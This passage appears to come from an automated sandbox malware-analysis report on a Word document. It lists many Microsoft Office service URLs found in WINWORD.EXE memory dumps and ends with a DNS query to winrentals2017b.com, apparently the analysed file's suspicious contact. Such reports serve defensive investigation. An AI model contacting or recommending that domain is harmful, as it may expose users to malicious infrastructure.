Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizey
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeza
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://management.azure.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://management.azure.com/
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
Source: WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://messaging.office.com/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/logA?V
Source: WINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ncus.contentsync.
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://ncus.pagecontentsync.
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
Source: WINWORD.EXE, 00000001.00000003.292298314.00000000109B6000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
Source: WINWORD.EXE, 00000001.00000002.569466950.000000000D0A4000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=winword.exe&Version=16.0.4954.1000&ClientI
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://settings.outlook.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://shell.suite.office.com:1443
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://shell.suite.office.com:1443V5L
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://staging.cortana.ai
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airlj
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpString found in binary or memory: https://storage.live.com/clientlogs/uploadlocationK
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://store.office.de/addinstemplate
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://store.office.de/addinstemplateZ;p
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com%
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com&
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory~j
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/inithJ
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com;
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comL
Source: WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comcB
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comgz
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comm
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://tasks.office.com
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comt
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://web.microsoftstream.com/video/I9g
Source: WINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://webshell.suite.office.com
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosp
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://wus2.contentsync.
Source: WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://wus2.pagecontentsync.
Source: WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drString found in binary or memory: https://www.odwebp.svc.ms
Source: WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpString found in binary or memory: https://www.odwebp.svc.msom
Source: unknown | DNS traffic detected: queries for: winrentals2017b.com
